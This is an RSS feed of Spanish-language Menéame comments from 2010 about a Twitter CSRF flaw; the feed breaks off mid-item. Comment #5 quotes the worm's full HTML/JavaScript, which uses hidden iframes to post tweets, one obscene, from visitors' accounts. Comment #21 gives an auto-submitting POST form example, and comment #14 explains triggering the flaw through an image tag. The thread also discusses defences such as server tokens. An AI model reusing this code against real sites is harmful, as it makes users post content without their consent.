<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" 
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:wfw="http://wellformedweb.org/CommentAPI/"
     xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:meneame="http://meneame.net/faq-es.php"
 >
<channel>
	<title>Menéame: comentarios [1057401]</title>
	<link>http://www.meneame.net</link>
	<image><title>www.meneame.net</title><link>http://www.meneame.net</link><url>http://cdn.mnmstatic.net/img/mnm/eli-rss.png</url></image>
	<description>Sitio colaborativo de publicación y comunicación entre blogs</description>
	<pubDate>Mon, 27 Sep 2010 19:19:50 +0000</pubDate>
	<generator>http://blog.meneame.net/</generator>
	<language>es</language>
	<item>
		<meneame:comment_id>7063103</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>26</meneame:order>
		<meneame:user>manuelmaria</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#26 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c026#c-26</link>
		<pubDate>Mon, 27 Sep 2010 19:19:50 +0000</pubDate>
		<dc:creator>manuelmaria</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c026#c-26</guid>
		<description><![CDATA[<p>Nada es seguro</p><p>&#187;&nbsp;autor: <strong>manuelmaria</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7060190</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>25</meneame:order>
		<meneame:user>estoyausente</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>11</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#25 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c025#c-25</link>
		<pubDate>Mon, 27 Sep 2010 10:23:58 +0000</pubDate>
		<dc:creator>estoyausente</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c025#c-25</guid>
		<description><![CDATA[<p><a class="tooltip c:1057401-14" href="https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c014#c-14" rel="nofollow">#14</a> sí... quizá tengas razón. Supongo que dejarán hacer peticiones mediante GET para facilitar los programillas con la API de twitter, que hay muchos.<br />
<br />
Pero visto así...<br />
<br />
Igualmente puedes lanzar de forma medianamente sencilla peticiones POST, ¿no? Aunque quizá complicase el script.</p><p>&#187;&nbsp;autor: <strong>estoyausente</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7060122</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>24</meneame:order>
		<meneame:user>PussyLover</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#24 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c024#c-24</link>
		<pubDate>Mon, 27 Sep 2010 10:09:09 +0000</pubDate>
		<dc:creator>PussyLover</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c024#c-24</guid>
		<description><![CDATA[<p>Vamos, que todo aquel que pinche en el enlace es que es zoofilico. Se podría sacar una buena estadistica de cuanta gente le va el tema. <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/smiley.png" alt=":-)" title=":-)" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>PussyLover</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7060069</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>23</meneame:order>
		<meneame:user>dancion</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>5</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#23 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c023#c-23</link>
		<pubDate>Mon, 27 Sep 2010 09:58:08 +0000</pubDate>
		<dc:creator>dancion</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c023#c-23</guid>
		<description><![CDATA[<p>twiiter quiere llegar a ser facebokk... y nunca lo sera me parece ami</p><p>&#187;&nbsp;autor: <strong>dancion</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7059514</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>22</meneame:order>
		<meneame:user>tunic</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>8</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#22 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c022#c-22</link>
		<pubDate>Mon, 27 Sep 2010 08:06:33 +0000</pubDate>
		<dc:creator>tunic</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c022#c-22</guid>
		<description><![CDATA[<p><a class="tooltip c:1057401-21" href="https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c021#c-21" rel="nofollow">#21</a> Por supuesto el método POST también se puede trucar, pero es más difícil. No basta con construir un enlace, se tienen que enviar los datos mediante POST lo que implica un poco más de proceso, que requiere JavaScript. Y como tú dices, cuando envías por POST el navegador puede avisarte (no todos lo hacen, eso sí), lo que a un usuario medianamente avispado le haría sospechar.<br />
<br />
En el ejemplo de Twitter usan JS, pero realmente no sería necesario.</p><p>&#187;&nbsp;autor: <strong>tunic</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7058637</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>21</meneame:order>
		<meneame:user>--14336--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>13</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#21 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c021#c-21</link>
		<pubDate>Sun, 26 Sep 2010 22:19:36 +0000</pubDate>
		<dc:creator>--14336--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c021#c-21</guid>
		<description><![CDATA[<p><a class="tooltip c:1057401-14" href="https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c014#c-14" rel="nofollow">#14</a> El POST no salva el asunto. Ejemplo (no se aplica a ningún sitio en concreto):<br />
<br />
&#60;form method=&#34;POST&#34; action=&#34;nuevo_tweet&#34; id=&#34;miForm&#34;&#62;<br />
&#60;input type=&#34;hidden&#34; name=&#34;mensaje&#34; value=&#34;te la he colado&#34;/&#62;<br />
&#60;input type=&#34;hidden&#34; name=&#34;loqueusea&#34; value=&#34;cualqueira&#34;/&#62;<br />
&#60;/form&#62;<br />
&#60;script&#62;<br />
&#60;document.getElementById('miForm').submit();<br />
&#60;/script&#62;<br />
<br />
La solución, ya sea por get o por post, es usar llaves generadas por el servidor, de forma que un atacante externo no pueda adivinarla.<br />
<br />
Lo de hacer que las operaciones en el servidor (publicar una entrada) sean por POST en vez de por GET es debido a que por POST el navegador te avisa antes de volver a enviar algo, ya que suele usarse para hacer operaciones sobre bases de datos, y a que por POST no queda registro en el historial de la información enviada al servidor.</p><p>&#187;&nbsp;autor: <strong>--14336--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7058634</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>20</meneame:order>
		<meneame:user>RamonMercader</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>16</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#20 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c020#c-20</link>
		<pubDate>Sun, 26 Sep 2010 22:18:40 +0000</pubDate>
		<dc:creator>RamonMercader</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c020#c-20</guid>
		<description><![CDATA[<p>Esto huele a 4chan <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>RamonMercader</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7058604</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>19</meneame:order>
		<meneame:user>XM8</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>21</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#19 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c019#c-19</link>
		<pubDate>Sun, 26 Sep 2010 22:12:43 +0000</pubDate>
		<dc:creator>XM8</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c019#c-19</guid>
		<description><![CDATA[<p>Esto en jisko no pasaba.</p><p>&#187;&nbsp;autor: <strong>XM8</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7058574</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>18</meneame:order>
		<meneame:user>--178478--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>14</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#18 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c018#c-18</link>
		<pubDate>Sun, 26 Sep 2010 22:06:55 +0000</pubDate>
		<dc:creator>--178478--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c018#c-18</guid>
		<description><![CDATA[<p>no! espera! ahora si!</p><p>&#187;&nbsp;autor: <strong>--178478--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7058573</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>17</meneame:order>
		<meneame:user>--178478--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>0</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#17 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c017#c-17</link>
		<pubDate>Sun, 26 Sep 2010 22:06:45 +0000</pubDate>
		<dc:creator>--178478--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c017#c-17</guid>
		<description><![CDATA[<p>no, ya no , lo han arreglado</p><p>&#187;&nbsp;autor: <strong>--178478--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7058571</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>16</meneame:order>
		<meneame:user>--178478--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>0</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#16 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c016#c-16</link>
		<pubDate>Sun, 26 Sep 2010 22:06:36 +0000</pubDate>
		<dc:creator>--178478--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c016#c-16</guid>
		<description><![CDATA[<p>ahora si</p><p>&#187;&nbsp;autor: <strong>--178478--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7058569</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>15</meneame:order>
		<meneame:user>--178478--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>0</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#15 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c015#c-15</link>
		<pubDate>Sun, 26 Sep 2010 22:06:30 +0000</pubDate>
		<dc:creator>--178478--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c015#c-15</guid>
		<description><![CDATA[<p>ahora ya no</p><p>&#187;&nbsp;autor: <strong>--178478--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7058529</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>14</meneame:order>
		<meneame:user>tunic</meneame:user>
		<meneame:votes>7</meneame:votes>
		<meneame:karma>47</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#14 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c014#c-14</link>
		<pubDate>Sun, 26 Sep 2010 22:00:18 +0000</pubDate>
		<dc:creator>tunic</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c014#c-14</guid>
		<description><![CDATA[<p><a class="tooltip c:1057401-10" href="https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c010#c-10" rel="nofollow">#10</a> <a class="tooltip c:1057401-11" href="https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c011#c-11" rel="nofollow">#11</a> Yo lo calificaría de vulnerabilidad. El problema de base es que Twitter permite actualizar el estado de un usuario logado mediante una petición GET (es decir, un enlace acompañado de parámetros, lo que viene detrás de la '?'). De esta forma, es tan sencillo publicar un tweet en la cuenta de un usuario como conseguir que visite una página donde haya un enlace maliciosamente construido, del tipo:<br />
<br />
twitter.com/share/update?status=&#60;ponga aquí la frase inyectar&#62;; <br />
<br />
El enlace no tiene no que ser visible ni que ser pinchado por el usuario, basta con el que navegador acceda a él (por ejemplo, poniéndolo como origen de una imagen, es decir, en el atributo src de una etiqueta img).<br />
<br />
Como el usuario está logado en Twitter la petición pasa todos los controles de seguridad; al fin y al cabo a todas luces parece una petición legítima de un usuario legítimo.<br />
<br />
Por este tipo de problemas se recomienda que una aplicación web no permita hacer operaciones sobre los datos del usuario mediante peticiones GET (como en este caso, que permite crear un tweet mediante una petición GET). Las peticiones que modifiquen datos deberían hacerse usando POST (normalmente mediante un formulario).<br />
<br />
Como no uso Twitter no sé por que no han escogido la opción POST para la creación de un nuevo tweet... sospecho que debe ser para facilitar la interacción externa (es más fácil construir un enlace con parámetros que una petición POST... aunque TAMPOCO es que sea tan difícil), pero si es por eso diría una pésima decisión de diseño. Lo mismo hay alguna poderosa razón para usar GET para la actualización de estado que yo desconozco, pero no se me ocurre cuál.<br />
<br />
En fin, podrán haber deshabilitado ese enlace, pero pueden aparecer un montón más muy fácilmente. Deberían cambiar el método de actualización a POST para estar del todo seguro.</p><p>&#187;&nbsp;autor: <strong>tunic</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7058521</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>13</meneame:order>
		<meneame:user>el_fake</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#13 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c013#c-13</link>
		<pubDate>Sun, 26 Sep 2010 21:59:17 +0000</pubDate>
		<dc:creator>el_fake</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c013#c-13</guid>
		<description><![CDATA[<p>Estos de twitter y facebook tienen una guerra de hackers que no es ni normal.</p><p>&#187;&nbsp;autor: <strong>el_fake</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7058195</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>12</meneame:order>
		<meneame:user>--45163--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>13</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#12 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c012#c-12</link>
		<pubDate>Sun, 26 Sep 2010 20:44:07 +0000</pubDate>
		<dc:creator>--45163--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c012#c-12</guid>
		<description><![CDATA[<p>No pienses en un oso blanco</p><p>&#187;&nbsp;autor: <strong>--45163--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7058066</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>11</meneame:order>
		<meneame:user>estoyausente</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>11</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#11 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c011#c-11</link>
		<pubDate>Sun, 26 Sep 2010 20:10:46 +0000</pubDate>
		<dc:creator>estoyausente</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c011#c-11</guid>
		<description><![CDATA[<p><a class="tooltip c:1057401-10" href="https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c010#c-10" rel="nofollow">#10</a> en realidad si lo lees no es una vulnerabilidad de twitter ni nada por el estilo. La idea es simple y no es maliciosa, simplemente está hecha para reírse un rato del personal. No creo que sea complicado repetir algo así.<br />
<br />
Y el texto es un descojono <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>estoyausente</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7057919</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>10</meneame:order>
		<meneame:user>--76102--</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>37</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#10 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c010#c-10</link>
		<pubDate>Sun, 26 Sep 2010 19:24:38 +0000</pubDate>
		<dc:creator>--76102--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c010#c-10</guid>
		<description><![CDATA[<p>Los de Twitter se están luciendo con sus vulnerabilidades desde el nuevo rediseño de la web principal que pretende sustituir a los clientes de escritorio. Al final los que usamos Tweetdeck y demás no echaremos en falta el rediseño.</p><p>&#187;&nbsp;autor: <strong>--76102--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7057914</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>9</meneame:order>
		<meneame:user>Ictineo</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>8</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#9 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c09#c-9</link>
		<pubDate>Sun, 26 Sep 2010 19:23:40 +0000</pubDate>
		<dc:creator>Ictineo</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c09#c-9</guid>
		<description><![CDATA[<p>No me extraña...<br />
<br />
<a href="http://www.meneame.net/story/chavez-usa-twitter-para-arengar-partidarios-jornada-electoral" title="www.meneame.net/story/chavez-usa-twitter-para-arengar-partidarios-jornada-electoral" rel="nofollow">www.meneame.net/story/chavez-usa-twitter-para-arengar-partidarios-jorn</a></p><p>&#187;&nbsp;autor: <strong>Ictineo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7057859</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>8</meneame:order>
		<meneame:user>zzzzzz</meneame:user>
		<meneame:votes>4</meneame:votes>
		<meneame:karma>-9</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#8 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c08#c-8</link>
		<pubDate>Sun, 26 Sep 2010 19:12:25 +0000</pubDate>
		<dc:creator>zzzzzz</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c08#c-8</guid>
		<description><![CDATA[<p><b>WTF:</b> <a href="http://tinyurl.com/2wpodmb" title="tinyurl.com/2wpodmb" rel="nofollow">tinyurl.com/2wpodmb</a></p><p>&#187;&nbsp;autor: <strong>zzzzzz</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7057775</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>7</meneame:order>
		<meneame:user>--148619--</meneame:user>
		<meneame:votes>4</meneame:votes>
		<meneame:karma>47</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#7 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c07#c-7</link>
		<pubDate>Sun, 26 Sep 2010 18:50:48 +0000</pubDate>
		<dc:creator>--148619--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c07#c-7</guid>
		<description><![CDATA[<p>Parace ser que ya lo han arreglado: <a href="http://status.twitter.com/post/1192873885/malicious-links-on-twitter" title="status.twitter.com/post/1192873885/malicious-links-on-twitter" rel="nofollow">status.twitter.com/post/1192873885/malicious-links-on-twitter</a><br />
<br />
UPDATE Sun Sep 26 18:41:49 UTC 2010: We’ve fixed the exploit and are in the process of removing the offending Tweets.</p><p>&#187;&nbsp;autor: <strong>--148619--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7057752</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>6</meneame:order>
		<meneame:user>--141578--</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>18</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#6 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c06#c-6</link>
		<pubDate>Sun, 26 Sep 2010 18:46:31 +0000</pubDate>
		<dc:creator>--141578--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c06#c-6</guid>
		<description><![CDATA[<p>[Usuario deshabilitado]</p><p>&#187;&nbsp;autor: <strong>--141578--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7057751</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>5</meneame:order>
		<meneame:user>--148619--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>21</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#5 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c05#c-5</link>
		<pubDate>Sun, 26 Sep 2010 18:46:22 +0000</pubDate>
		<dc:creator>--148619--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c05#c-5</guid>
		<description><![CDATA[<p>este es el código del gusano según dicen por ahí: <a href="http://news.ycombinator.com/item?id=1729601" title="news.ycombinator.com/item?id=1729601" rel="nofollow">news.ycombinator.com/item?id=1729601</a><br />
<br />
------------ 8&#60; ----------- 8&#60;--------------------<br />
    &#60;html&#62;<br />
    &#60;head&#62;&#60;/head&#62;<br />
    &#60;body&#62;<br />
    &#60;script&#62;<br />
    var el1 = document.createElement('iframe');<br />
    var el2 = document.createElement('iframe');<br />
    el1.style.visibility=&#34;hidden&#34;;<br />
    el2.style.visibility=&#34;hidden&#34;;<br />
    el1.src = &#34;<a href="http://twitter.com/share/update?status=WTF: &quot" title="twitter.com/share/update?status=WTF: &quot" rel="nofollow">twitter.com/share/update?status=WTF: &quot</a>; + window.location;<br />
    el2.src = &#34;<a href="http://twitter.com/share/update?status=i love anal sex with goats&quot" title="twitter.com/share/update?status=i love anal sex with goats&quot" rel="nofollow">twitter.com/share/update?status=i love anal sex with goats&quot</a>;;<br />
    document.getElementsByTagName(&#34;body&#34;)[0].appendChild(el1);<br />
    document.getElementsByTagName(&#34;body&#34;)[0].appendChild(el2);<br />
    &#60;/script&#62;<br />
    &#60;/body&#62;<br />
    &#60;/html&#62;<br />
------------ 8&#60; ----------- 8&#60;--------------------</p><p>&#187;&nbsp;autor: <strong>--148619--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7057742</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>4</meneame:order>
		<meneame:user>--148619--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>25</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#4 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c04#c-4</link>
		<pubDate>Sun, 26 Sep 2010 18:43:27 +0000</pubDate>
		<dc:creator>--148619--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c04#c-4</guid>
		<description><![CDATA[<p>Os suena el queso gruyere?</p><p>&#187;&nbsp;autor: <strong>--148619--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7057668</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>3</meneame:order>
		<meneame:user>--150977--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>17</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#3 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c03#c-3</link>
		<pubDate>Sun, 26 Sep 2010 18:27:15 +0000</pubDate>
		<dc:creator>--150977--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c03#c-3</guid>
		<description><![CDATA[<p><a class="tooltip l:1057401" href="https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos" rel="nofollow">#0</a> Actualiza la entradilla que ya hay más información en el enlace.</p><p>&#187;&nbsp;autor: <strong>--150977--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7057651</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>2</meneame:order>
		<meneame:user>--132341--</meneame:user>
		<meneame:votes>3</meneame:votes>
		<meneame:karma>39</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
